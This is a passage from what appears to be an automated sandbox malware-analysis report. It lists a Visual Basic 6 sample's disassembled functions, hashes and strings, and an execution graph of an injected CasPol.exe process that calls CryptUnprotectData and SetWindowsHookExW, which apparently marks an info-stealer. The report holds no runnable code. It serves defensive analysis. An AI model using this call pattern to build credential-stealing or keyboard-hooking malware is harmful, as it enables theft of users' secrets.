                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.1331544420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.1331519380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000002.00000002.1331757384.0000000000427000.00000004.00020000.sdmp Download File
                                                                                                    • Associated: 00000002.00000002.1331787354.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                    • Associated: 00000002.00000002.1331825039.000000000042B000.00000002.00020000.sdmp Download File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_G47wmLn8uy.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __vba$Free$CheckHresult$MoveNew2$#518#608#616ChkstkList
                                                                                                    • String ID: Barografer$DuB$DuB$Jonbytningens$[B
                                                                                                    • API String ID: 3734238518-3129503355
                                                                                                    • Opcode ID: 7510de19c4ca892f14c2f1bb8b8cbb38fe7cdfa00d7846b05cbf1fecccc1d13e
                                                                                                    • Instruction ID: 9b473f61f771ad3568be85be8ee1cbf5cff367bdfec83ad449fcd426b4a442c7
                                                                                                    • Opcode Fuzzy Hash: 7510de19c4ca892f14c2f1bb8b8cbb38fe7cdfa00d7846b05cbf1fecccc1d13e
                                                                                                    • Instruction Fuzzy Hash: 3881E771A40228EFDB10EF95CC45BDDBBB4BF08304F5080AAE149B72A1DB789A85DF55
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0042581F, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 57COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __vbaChkstk.MSVBVM60(?,004015F6), ref: 0042583A
                                                                                                    • __vbaStrCopy.MSVBVM60(?,?,?,?,004015F6), ref: 00425852
                                                                                                    • __vbaVarDup.MSVBVM60 ref: 0042586B
                                                                                                    • #717.MSVBVM60(?,?,00000080,00000000), ref: 0042587F
                                                                                                    • __vbaVar2Vec.MSVBVM60(?,?,?,?,00000080,00000000), ref: 0042588C
                                                                                                    • __vbaAryMove.MSVBVM60(?,?,?,?,?,?,00000080,00000000), ref: 00425899
                                                                                                    • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,?,?,?,00000080,00000000), ref: 004258A8
                                                                                                    • __vbaFreeStr.MSVBVM60(004258E9), ref: 004258D8
                                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?,004258E9), ref: 004258E3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.1331544420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.1331519380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000002.00000002.1331757384.0000000000427000.00000004.00020000.sdmp Download File
                                                                                                    • Associated: 00000002.00000002.1331787354.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                    • Associated: 00000002.00000002.1331825039.000000000042B000.00000002.00020000.sdmp Download File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_G47wmLn8uy.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __vba$Free$#717ChkstkCopyDestructListMoveVar2
                                                                                                    • String ID: Navigator
                                                                                                    • API String ID: 2301300132-3947187026
                                                                                                    • Opcode ID: 3df075880c4e8816ef33399e613a1eaf4c0baab84f18073cec6cd229508518fe
                                                                                                    • Instruction ID: 6a67e730fad9b39f50e27318765839e1674d197514a860e8d766d4b19915992d
                                                                                                    • Opcode Fuzzy Hash: 3df075880c4e8816ef33399e613a1eaf4c0baab84f18073cec6cd229508518fe
                                                                                                    • Instruction Fuzzy Hash: 5D11CBB2D4020DBADB00FBD1DC46FDEBBBCAB04744F50452BF205B6191EB78A6498B65
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0042494D, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 45COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __vbaChkstk.MSVBVM60(?,004015F6), ref: 00424969
                                                                                                    • __vbaStrCopy.MSVBVM60(?,?,?,?,004015F6), ref: 00424993
                                                                                                    • __vbaVarDup.MSVBVM60 ref: 004249AC
                                                                                                    • #705.MSVBVM60(?,00000000), ref: 004249B7
                                                                                                    • __vbaStrMove.MSVBVM60(?,00000000), ref: 004249C1
                                                                                                    • __vbaFreeVar.MSVBVM60(?,00000000), ref: 004249C9
                                                                                                    • __vbaFreeStr.MSVBVM60(004249F6,?,00000000), ref: 004249E8
                                                                                                    • __vbaFreeStr.MSVBVM60(004249F6,?,00000000), ref: 004249F0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.1331544420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.1331519380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000002.00000002.1331757384.0000000000427000.00000004.00020000.sdmp Download File
                                                                                                    • Associated: 00000002.00000002.1331787354.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                    • Associated: 00000002.00000002.1331825039.000000000042B000.00000002.00020000.sdmp Download File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_G47wmLn8uy.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __vba$Free$#705ChkstkCopyMove
                                                                                                    • String ID: 10-10-10
                                                                                                    • API String ID: 3591744543-2205135882
                                                                                                    • Opcode ID: 58c60a9184287c21eb8744a05f62e9a2bb3457face02052ebd90a89466259637
                                                                                                    • Instruction ID: 725650b361188e2a4034f360c027ab5faa200d739ddf121de00baecf2b889d27
                                                                                                    • Opcode Fuzzy Hash: 58c60a9184287c21eb8744a05f62e9a2bb3457face02052ebd90a89466259637
                                                                                                    • Instruction Fuzzy Hash: 7B11FA71900219ABCB00EF91D896FDEBBB4BF40704F50802AF4017B2A1DB7CAA05CB98
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00424DA6, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 39COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.1331544420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.1331519380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000002.00000002.1331757384.0000000000427000.00000004.00020000.sdmp Download File
                                                                                                    • Associated: 00000002.00000002.1331787354.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                    • Associated: 00000002.00000002.1331825039.000000000042B000.00000002.00020000.sdmp Download File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_G47wmLn8uy.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __vba$#598#667ChkstkFreeMove
                                                                                                    • String ID: userprofile
                                                                                                    • API String ID: 2319187996-490100401
                                                                                                    • Opcode ID: 9a5c68418550624023a3654e0fbbfbcc9e956da9d92d8c959f495d3a5f612446
                                                                                                    • Instruction ID: 322d0e2b990dbe00e9d3cd7bff254a52e25d026fd6fbca958f0d572a0cd4ff53
                                                                                                    • Opcode Fuzzy Hash: 9a5c68418550624023a3654e0fbbfbcc9e956da9d92d8c959f495d3a5f612446
                                                                                                    • Instruction Fuzzy Hash: 33012C75900208ABDB00EFA5D846FCEBFB4FF44754F40802AF401BB1A1DB789A45CB94
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00424CFE, Relevance: 9.0, APIs: 6, Instructions: 39COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __vbaChkstk.MSVBVM60(?,004015F6), ref: 00424D1A
                                                                                                    • #539.MSVBVM60(000000B0,00000051,000000B0,0000008E,?,?,?,?,004015F6), ref: 00424D4E
                                                                                                    • __vbaStrVarMove.MSVBVM60(000000B0,000000B0,00000051,000000B0,0000008E,?,?,?,?,004015F6), ref: 00424D57
                                                                                                    • __vbaStrMove.MSVBVM60(000000B0,000000B0,00000051,000000B0,0000008E,?,?,?,?,004015F6), ref: 00424D61
                                                                                                    • __vbaFreeVar.MSVBVM60(000000B0,000000B0,00000051,000000B0,0000008E,?,?,?,?,004015F6), ref: 00424D69
                                                                                                    • __vbaFreeStr.MSVBVM60(00424D87,000000B0,000000B0,00000051,000000B0,0000008E,?,?,?,?,004015F6), ref: 00424D81
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.1331544420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.1331519380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000002.00000002.1331757384.0000000000427000.00000004.00020000.sdmp Download File
                                                                                                    • Associated: 00000002.00000002.1331787354.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                    • Associated: 00000002.00000002.1331825039.000000000042B000.00000002.00020000.sdmp Download File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_G47wmLn8uy.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __vba$FreeMove$#539Chkstk
                                                                                                    • String ID:
                                                                                                    • API String ID: 679637206-0
                                                                                                    • Opcode ID: be4064ea8c6ebe3b65d73cc9141c35eaa2acb41f4aff6ee73144efebbadd9ac2
                                                                                                    • Instruction ID: 3981a885a631bff9d5509f01a61757284ddcaf8d542b64ede17bd6b0136ab70d
                                                                                                    • Opcode Fuzzy Hash: be4064ea8c6ebe3b65d73cc9141c35eaa2acb41f4aff6ee73144efebbadd9ac2
                                                                                                    • Instruction Fuzzy Hash: 65011D71A40208BBCB00EBA5CD56FDEBBB8EF44714F44402AF101BB1E1DBB89545CB99
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Analysis Process: CasPol.exe PID: 4712 Parent PID: 2128 CasPol.exeCOMMON

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:16.7%
                                                                                                    Dynamic/Decrypted Code Coverage:99.7%
                                                                                                    Signature Coverage:2%
                                                                                                    Total number of Nodes:977
                                                                                                    Total number of Limit Nodes:37

                                                                                                    Graph

                                                                                                    execution_graph 80796 c00494 80797 c00452 80796->80797 80798 c004a2 80796->80798 80805 c00ff5 80797->80805 80809 c00ff8 80797->80809 80799 c00457 80813 c04cd3 80799->80813 80819 c04ce0 80799->80819 80800 c00491 80806 c01028 80805->80806 80825 c00b7c 80806->80825 80808 c010d8 80808->80799 80810 c01028 80809->80810 80811 c00b7c FindWindowW 80810->80811 80812 c010d8 80811->80812 80812->80799 80815 c04d11 80813->80815 80816 c04e11 80813->80816 80814 c04d1d 80814->80800 80815->80814 80833 1dce4798 80815->80833 80847 1dce4783 80815->80847 80816->80800 80821 c04d11 80819->80821 80822 c04e11 80819->80822 80820 c04d1d 80820->80800 80821->80820 80823 1dce4798 4 API calls 80821->80823 80824 1dce4783 4 API calls 80821->80824 80822->80800 80823->80822 80824->80822 80826 c00b87 80825->80826 80827 c021f1 80826->80827 80829 c00bac 80826->80829 80827->80808 80830 c02350 FindWindowW 80829->80830 80832 c023d5 80830->80832 80832->80827 80834 1dce47c3 80833->80834 80861 1dce36a0 80834->80861 80837 1dce4846 80840 1dce4872 80837->80840 80882 1dce32bc 80837->80882 80846 1dce36a0 3 API calls 80846->80837 80848 1dce47c3 80847->80848 80849 1dce36a0 3 API calls 80848->80849 80850 1dce482a 80849->80850 80857 1dce4d80 3 API calls 80850->80857 80858 1dce4d50 3 API calls 80850->80858 80859 1dce4cd0 3 API calls 80850->80859 80860 1dce36a0 3 API calls 80850->80860 80851 1dce4846 80852 1dce32bc GetModuleHandleW 80851->80852 80854 1dce4872 80851->80854 80853 1dce48b6 80852->80853 80855 1dce66a8 CreateWindowExW 80853->80855 80856 1dce6681 CreateWindowExW 80853->80856 80855->80854 80856->80854 80857->80851 80858->80851 80859->80851 80860->80851 80862 1dce36ab 80861->80862 80863 1dce482a 80862->80863 80892 1dce4ef0 80862->80892 80905 1dce4ee0 80862->80905 80863->80846 80866 1dce4d80 80863->80866 80871 1dce4d50 80863->80871 80876 1dce4cd0 80863->80876 80867 1dce4dad 80866->80867 80868 1dce4e2e 80867->80868 80869 1dce4ee0 2 API calls 80867->80869 80870 1dce4ef0 2 API calls 80867->80870 80869->80868 80870->80868 80872 1dce4dad 80871->80872 80873 1dce4e2e 80872->80873 80874 1dce4ee0 2 API calls 80872->80874 80875 1dce4ef0 2 API calls 80872->80875 80874->80873 80875->80873 80877 1dce4ceb 80876->80877 80878 1dce4cef 80876->80878 80877->80837 80879 1dce4e2e 80878->80879 80880 1dce4ee0 2 API calls 80878->80880 80881 1dce4ef0 2 API calls 80878->80881 80880->80879 80881->80879 80883 1dce5250 GetModuleHandleW 80882->80883 80885 1dce48b6 80883->80885 80886 1dce6681 80885->80886 80889 1dce66a8 80885->80889 80918 1dce4344 80886->80918 80890 1dce66dd 80889->80890 80891 1dce4344 CreateWindowExW 80889->80891 80890->80840 80891->80890 80893 1dce4f05 80892->80893 80894 1dce32bc GetModuleHandleW 80893->80894 80895 1dce4f4a 80893->80895 80894->80895 80896 1dce32bc GetModuleHandleW 80895->80896 80898 1dce5116 80895->80898 80901 1dce509b 80896->80901 80897 1dce5171 80897->80863 80898->80897 80899 1dce5298 GetModuleHandleW 80898->80899 80900 1dce52c5 80899->80900 80900->80863 80901->80897 80901->80898 80902 1dce32bc GetModuleHandleW 80901->80902 80903 1dce50e9 80902->80903 80903->80898 80904 1dce32bc GetModuleHandleW 80903->80904 80904->80898 80906 1dce4f05 80905->80906 80907 1dce32bc GetModuleHandleW 80906->80907 80908 1dce4f4a 80906->80908 80907->80908 80909 1dce32bc GetModuleHandleW 80908->80909 80917 1dce5116 80908->80917 80911 1dce509b 80909->80911 80910 1dce5171 80910->80863 80911->80910 80914 1dce32bc GetModuleHandleW 80911->80914 80911->80917 80912 1dce5298 GetModuleHandleW 80913 1dce52c5 80912->80913 80913->80863 80915 1dce50e9 80914->80915 80916 1dce32bc GetModuleHandleW 80915->80916 80915->80917 80916->80917 80917->80910 80917->80912 80919 1dce66f8 CreateWindowExW 80918->80919 80921 1dce681c 80919->80921 80921->80921 81855 1dcecafa 81856 1dcecb02 81855->81856 81857 1dceceac 81856->81857 81858 1dcece01 81856->81858 81861 c4a4cc 4 API calls 81856->81861 81862 c4a7cc 3 API calls 81856->81862 81863 c49b52 5 API calls 81856->81863 81864 c4aa52 GlobalMemoryStatusEx 81856->81864 81865 c49bdc 5 API calls 81856->81865 81866 c4a55c 3 API calls 81856->81866 81867 c4a85c 3 API calls 81856->81867 81868 c49959 7 API calls 81856->81868 81869 c4a364 4 API calls 81856->81869 81870 c4a664 3 API calls 81856->81870 81871 c49c66 5 API calls 81856->81871 81872 c4a2e0 4 API calls 81856->81872 81873 c4a5e0 3 API calls 81856->81873 81874 c499e3 7 API calls 81856->81874 81875 c4a8ec 3 API calls 81856->81875 81876 c49a6d 7 API calls 81856->81876 81877 c4a3f4 4 API calls 81856->81877 81878 c4a6f4 3 API calls 81856->81878 81879 c4a9f4 3 API calls 81856->81879 81880 c49cf0 5 API calls 81856->81880 81881 c4a97c 3 API calls 81856->81881 81882 c49d7a 5 API calls 81856->81882 81883 c49dfb 5 API calls 81856->81883 81884 c4a484 4 API calls 81856->81884 81885 c4a784 3 API calls 81856->81885 81886 c49b0d 5 API calls 81856->81886 81887 c4a514 4 API calls 81856->81887 81888 c4a814 3 API calls 81856->81888 81889 c49b97 5 API calls 81856->81889 81890 c4a31c 4 API calls 81856->81890 81891 c4999e 7 API calls 81856->81891 81892 c4a298 4 API calls 81856->81892 81893 c4a5a4 3 API calls 81856->81893 81894 c4a8a4 3 API calls 81856->81894 81895 c49c21 5 API calls 81856->81895 81896 c4a3ac 4 API calls 81856->81896 81897 c4a6ac 3 API calls 81856->81897 81898 c49a28 7 API calls 81856->81898 81899 c4a628 3 API calls 81856->81899 81900 c49cab 5 API calls 81856->81900 81901 c4a934 3 API calls 81856->81901 81902 c49d35 5 API calls 81856->81902 81903 c49e37 5 API calls 81856->81903 81904 c49ab2 7 API calls 81856->81904 81905 c4a43c 4 API calls 81856->81905 81906 c4a73c 3 API calls 81856->81906 81907 c49dbf 5 API calls 81856->81907 81908 c49938 7 API calls 81856->81908 81909 c4a9b8 3 API calls 81856->81909 81858->81857 81859 110de20 SetWindowsHookExW 81858->81859 81860 110de14 SetWindowsHookExW 81858->81860 81859->81857 81860->81857 81861->81858 81862->81858 81863->81858 81864->81858 81865->81858 81866->81858 81867->81858 81868->81858 81869->81858 81870->81858 81871->81858 81872->81858 81873->81858 81874->81858 81875->81858 81876->81858 81877->81858 81878->81858 81879->81858 81880->81858 81881->81858 81882->81858 81883->81858 81884->81858 81885->81858 81886->81858 81887->81858 81888->81858 81889->81858 81890->81858 81891->81858 81892->81858 81893->81858 81894->81858 81895->81858 81896->81858 81897->81858 81898->81858 81899->81858 81900->81858 81901->81858 81902->81858 81903->81858 81904->81858 81905->81858 81906->81858 81907->81858 81908->81858 81909->81858 80922 1dcec818 80924 1dcec835 80922->80924 80923 1dceceac 80924->80923 80925 1dcece01 80924->80925 80977 c4a7cc 80924->80977 80985 c4a4cc 80924->80985 80996 c4a9b8 80924->80996 81004 c49b52 80924->81004 81017 c49dbf 80924->81017 81030 c49938 80924->81030 81046 c4a43c 80924->81046 81057 c4a73c 80924->81057 81065 c49e37 80924->81065 81078 c49ab2 80924->81078 81094 c4a934 80924->81094 81102 c49d35 80924->81102 81115 c4a628 80924->81115 81123 c49cab 80924->81123 81136 c4a6ac 80924->81136 81144 c49a28 80924->81144 81160 c49c21 80924->81160 81173 c4a3ac 80924->81173 81184 c4a5a4 80924->81184 81192 c4a85c 80924->81192 81200 c4a8ec 80924->81200 81208 c4a298 80924->81208 81219 c49b97 80924->81219 81232 c4a31c 80924->81232 81243 c4a514 80924->81243 81254 c4a814 80924->81254 81262 c4a784 80924->81262 81270 c49b0d 80924->81270 81283 c49dfb 80924->81283 81296 c4a484 80924->81296 81307 c4a97c 80924->81307 81315 c49d7a 80924->81315 81328 c4a9f4 80924->81328 81336 c49cf0 80924->81336 81349 c4a3f4 80924->81349 81360 c4999e 80924->81360 81376 c4a8a4 80924->81376 81384 c49a6d 80924->81384 81400 c4a5e0 80924->81400 81408 c499e3 80924->81408 81424 c49c66 80924->81424 81437 c4a2e0 80924->81437 81448 c4a364 80924->81448 81459 c4a6f4 80924->81459 81467 c4a664 80924->81467 81475 c49959 80924->81475 81491 c49bdc 80924->81491 81504 c4a55c 80924->81504 81512 c4aa52 80924->81512 80925->80923 81517 110de20 80925->81517 81521 110de14 80925->81521 80978 c4a7dd 80977->80978 81525 110b140 80978->81525 81531 110b1a0 80978->81531 80979 c4aa21 80980 c4aa89 80979->80980 81536 110bc3f 80979->81536 81541 110bc40 80979->81541 80980->80925 80986 c4a4dd 80985->80986 81568 10facf0 80986->81568 81576 10fad00 80986->81576 80987 c4a541 80992 110b140 2 API calls 80987->80992 80993 110b1a0 2 API calls 80987->80993 80988 c4aa21 80989 c4aa89 80988->80989 80990 110bc40 GlobalMemoryStatusEx 80988->80990 80991 110bc3f GlobalMemoryStatusEx 80988->80991 80989->80925 80990->80989 80991->80989 80992->80988 80993->80988 80997 c4a9c9 80996->80997 81002 110b140 2 API calls 80997->81002 81003 110b1a0 2 API calls 80997->81003 80998 c4aa21 80999 c4aa89 80998->80999 81000 110bc40 GlobalMemoryStatusEx 80998->81000 81001 110bc3f GlobalMemoryStatusEx 80998->81001 80999->80925 81000->80999 81001->80999 81002->80998 81003->80998 81012 c49b63 81004->81012 81005 c49f6d LdrInitializeThunk 81006 c49fb2 81005->81006 81013 10fad00 CryptUnprotectData 81006->81013 81014 10facf0 CryptUnprotectData 81006->81014 81007 c4a541 81010 110b140 2 API calls 81007->81010 81011 110b1a0 2 API calls 81007->81011 81008 c4aa21 81009 c4aa89 81008->81009 81015 110bc40 GlobalMemoryStatusEx 81008->81015 81016 110bc3f GlobalMemoryStatusEx 81008->81016 81009->80925 81010->81008 81011->81008 81012->81005 81013->81007 81014->81007 81015->81009 81016->81009 81027 c49dd0 81017->81027 81018 c49f6d LdrInitializeThunk 81019 c49fb2 81018->81019 81028 10fad00 CryptUnprotectData 81019->81028 81029 10facf0 CryptUnprotectData 81019->81029 81020 c4a541 81025 110b140 2 API calls 81020->81025 81026 110b1a0 2 API calls 81020->81026 81021 c4aa21 81022 c4aa89 81021->81022 81023 110bc40 GlobalMemoryStatusEx 81021->81023 81024 110bc3f GlobalMemoryStatusEx 81021->81024 81022->80925 81023->81022 81024->81022 81025->81021 81026->81021 81027->81018 81028->81020 81029->81020 81031 c4993e 81030->81031 81624 ffa9e0 81031->81624 81628 ffa9db 81031->81628 81032 c49f6d LdrInitializeThunk 81033 c49fb2 81032->81033 81042 10fad00 CryptUnprotectData 81033->81042 81043 10facf0 CryptUnprotectData 81033->81043 81034 c4a541 81038 110b140 2 API calls 81034->81038 81039 110b1a0 2 API calls 81034->81039 81035 c4aa21 81036 c4aa89 81035->81036 81044 110bc40 GlobalMemoryStatusEx 81035->81044 81045 110bc3f GlobalMemoryStatusEx 81035->81045 81036->80925 81037 c49adc 81037->81032 81038->81035 81039->81035 81042->81034 81043->81034 81044->81036 81045->81036 81047 c4a44d 81046->81047 81051 10fad00 CryptUnprotectData 81047->81051 81052 10facf0 CryptUnprotectData 81047->81052 81048 c4a541 81055 110b140 2 API calls 81048->81055 81056 110b1a0 2 API calls 81048->81056 81049 c4aa21 81050 c4aa89 81049->81050 81053 110bc40 GlobalMemoryStatusEx 81049->81053 81054 110bc3f GlobalMemoryStatusEx 81049->81054 81050->80925 81051->81048 81052->81048 81053->81050 81054->81050 81055->81049 81056->81049 81058 c4a74d 81057->81058 81061 110b140 2 API calls 81058->81061 81062 110b1a0 2 API calls 81058->81062 81059 c4aa21 81060 c4aa89 81059->81060 81063 110bc40 GlobalMemoryStatusEx 81059->81063 81064 110bc3f GlobalMemoryStatusEx 81059->81064 81060->80925 81061->81059 81062->81059 81063->81060 81064->81060 81066 c49e48 81065->81066 81067 c49f6d LdrInitializeThunk 81066->81067 81068 c49fb2 81067->81068 81072 10fad00 CryptUnprotectData 81068->81072 81073 10facf0 CryptUnprotectData 81068->81073 81069 c4a541 81076 110b140 2 API calls 81069->81076 81077 110b1a0 2 API calls 81069->81077 81070 c4aa21 81071 c4aa89 81070->81071 81074 110bc40 GlobalMemoryStatusEx 81070->81074 81075 110bc3f GlobalMemoryStatusEx 81070->81075 81071->80925 81072->81069 81073->81069 81074->81071 81075->81071 81076->81070 81077->81070 81079 c49ac3 81078->81079 81090 ffa9db LdrInitializeThunk 81079->81090 81091 ffa9e0 LdrInitializeThunk 81079->81091 81080 c49f6d LdrInitializeThunk 81081 c49fb2 81080->81081 81092 10fad00 CryptUnprotectData 81081->81092 81093 10facf0 CryptUnprotectData 81081->81093 81082 c4a541 81087 110b140 2 API calls 81082->81087 81088 110b1a0 2 API calls 81082->81088 81083 c4aa21 81084 c4aa89 81083->81084 81085 110bc40 GlobalMemoryStatusEx 81083->81085 81086 110bc3f GlobalMemoryStatusEx 81083->81086 81084->80925 81085->81084 81086->81084 81087->81083 81088->81083 81089 c49adc 81089->81080 81090->81089 81091->81089 81092->81082 81093->81082 81095 c4a945 81094->81095 81098 110b140 2 API calls 81095->81098 81099 110b1a0 2 API calls 81095->81099 81096 c4aa21 81097 c4aa89 81096->81097 81100 110bc40 GlobalMemoryStatusEx 81096->81100 81101 110bc3f GlobalMemoryStatusEx 81096->81101 81097->80925 81098->81096 81099->81096 81100->81097 81101->81097 81110 c49d46 81102->81110 81103 c49f6d LdrInitializeThunk 81104 c49fb2 81103->81104 81111 10fad00 CryptUnprotectData 81104->81111 81112 10facf0 CryptUnprotectData 81104->81112 81105 c4a541 81108 110b140 2 API calls 81105->81108 81109 110b1a0 2 API calls 81105->81109 81106 c4aa21 81107 c4aa89 81106->81107 81113 110bc40 GlobalMemoryStatusEx 81106->81113 81114 110bc3f GlobalMemoryStatusEx 81106->81114 81107->80925 81108->81106 81109->81106 81110->81103 81111->81105 81112->81105 81113->81107 81114->81107 81116 c4a639 81115->81116 81121 110b140 2 API calls 81116->81121 81122 110b1a0 2 API calls 81116->81122 81117 c4aa21 81118 c4aa89 81117->81118 81119 110bc40 GlobalMemoryStatusEx 81117->81119 81120 110bc3f GlobalMemoryStatusEx 81117->81120 81118->80925 81119->81118 81120->81118 81121->81117 81122->81117 81133 c49cbc 81123->81133 81124 c49f6d LdrInitializeThunk 81125 c49fb2 81124->81125 81134 10fad00 CryptUnprotectData 81125->81134 81135 10facf0 CryptUnprotectData 81125->81135 81126 c4a541 81131 110b140 2 API calls 81126->81131 81132 110b1a0 2 API calls 81126->81132 81127 c4aa21 81128 c4aa89 81127->81128 81129 110bc40 GlobalMemoryStatusEx 81127->81129 81130 110bc3f GlobalMemoryStatusEx 81127->81130 81128->80925 81129->81128 81130->81128 81131->81127 81132->81127 81133->81124 81134->81126 81135->81126 81137 c4a6bd 81136->81137 81140 110b140 2 API calls 81137->81140 81141 110b1a0 2 API calls 81137->81141 81138 c4aa21 81139 c4aa89 81138->81139 81142 110bc40 GlobalMemoryStatusEx 81138->81142 81143 110bc3f GlobalMemoryStatusEx 81138->81143 81139->80925 81140->81138 81141->81138 81142->81139 81143->81139 81145 c49a39 81144->81145 81154 ffa9db LdrInitializeThunk 81145->81154 81155 ffa9e0 LdrInitializeThunk 81145->81155 81146 c49f6d LdrInitializeThunk 81147 c49fb2 81146->81147 81156 10fad00 CryptUnprotectData 81147->81156 81157 10facf0 CryptUnprotectData 81147->81157 81148 c4a541 81151 110b140 2 API calls 81148->81151 81152 110b1a0 2 API calls 81148->81152 81149 c4aa21 81150 c4aa89 81149->81150 81158 110bc40 GlobalMemoryStatusEx 81149->81158 81159 110bc3f GlobalMemoryStatusEx 81149->81159 81150->80925 81151->81149 81152->81149 81153 c49adc 81153->81146 81154->81153 81155->81153 81156->81148 81157->81148 81158->81150 81159->81150 81166 c49c32 81160->81166 81161 c49f6d LdrInitializeThunk 81162 c49fb2 81161->81162 81169 10fad00 CryptUnprotectData 81162->81169 81170 10facf0 CryptUnprotectData 81162->81170 81163 c4a541 81167 110b140 2 API calls 81163->81167 81168 110b1a0 2 API calls 81163->81168 81164 c4aa21 81165 c4aa89 81164->81165 81171 110bc40 GlobalMemoryStatusEx 81164->81171 81172 110bc3f GlobalMemoryStatusEx 81164->81172 81165->80925 81166->81161 81167->81164 81168->81164 81169->81163 81170->81163 81171->81165 81172->81165 81174 c4a3bd 81173->81174 81178 10fad00 CryptUnprotectData 81174->81178 81179 10facf0 CryptUnprotectData 81174->81179 81175 c4a541 81182 110b140 2 API calls 81175->81182 81183 110b1a0 2 API calls 81175->81183 81176 c4aa21 81177 c4aa89 81176->81177 81180 110bc40 GlobalMemoryStatusEx 81176->81180 81181 110bc3f GlobalMemoryStatusEx 81176->81181 81177->80925 81178->81175 81179->81175 81180->81177 81181->81177 81182->81176 81183->81176 81185 c4a5b5 81184->81185 81190 110b140 2 API calls 81185->81190 81191 110b1a0 2 API calls 81185->81191 81186 c4aa21 81187 c4aa89 81186->81187 81188 110bc40 GlobalMemoryStatusEx 81186->81188 81189 110bc3f GlobalMemoryStatusEx 81186->81189 81187->80925 81188->81187 81189->81187 81190->81186 81191->81186 81193 c4a86d 81192->81193 81198 110b140 2 API calls 81193->81198 81199 110b1a0 2 API calls 81193->81199 81194 c4aa21 81195 c4aa89 81194->81195 81196 110bc40 GlobalMemoryStatusEx 81194->81196 81197 110bc3f GlobalMemoryStatusEx 81194->81197 81195->80925 81196->81195 81197->81195 81198->81194 81199->81194 81201 c4a8fd 81200->81201 81204 110b140 2 API calls 81201->81204 81205 110b1a0 2 API calls 81201->81205 81202 c4aa21 81203 c4aa89 81202->81203 81206 110bc40 GlobalMemoryStatusEx 81202->81206 81207 110bc3f GlobalMemoryStatusEx 81202->81207 81203->80925 81204->81202 81205->81202 81206->81203 81207->81203 81209 c4a2a9 81208->81209 81217 10fad00 CryptUnprotectData 81209->81217 81218 10facf0 CryptUnprotectData 81209->81218 81210 c4a541 81215 110b140 2 API calls 81210->81215 81216 110b1a0 2 API calls 81210->81216 81211 c4aa21 81212 c4aa89 81211->81212 81213 110bc40 GlobalMemoryStatusEx 81211->81213 81214 110bc3f GlobalMemoryStatusEx 81211->81214 81212->80925 81213->81212 81214->81212 81215->81211 81216->81211 81217->81210 81218->81210 81225 c49ba8 81219->81225 81220 c49f6d LdrInitializeThunk 81221 c49fb2 81220->81221 81228 10fad00 CryptUnprotectData 81221->81228 81229 10facf0 CryptUnprotectData 81221->81229 81222 c4a541 81226 110b140 2 API calls 81222->81226 81227 110b1a0 2 API calls 81222->81227 81223 c4aa21 81224 c4aa89 81223->81224 81230 110bc40 GlobalMemoryStatusEx 81223->81230 81231 110bc3f GlobalMemoryStatusEx 81223->81231 81224->80925 81225->81220 81226->81223 81227->81223 81228->81222 81229->81222 81230->81224 81231->81224 81233 c4a32d 81232->81233 81237 10fad00 CryptUnprotectData 81233->81237 81238 10facf0 CryptUnprotectData 81233->81238 81234 c4a541 81241 110b140 2 API calls 81234->81241 81242 110b1a0 2 API calls 81234->81242 81235 c4aa21 81236 c4aa89 81235->81236 81239 110bc40 GlobalMemoryStatusEx 81235->81239 81240 110bc3f 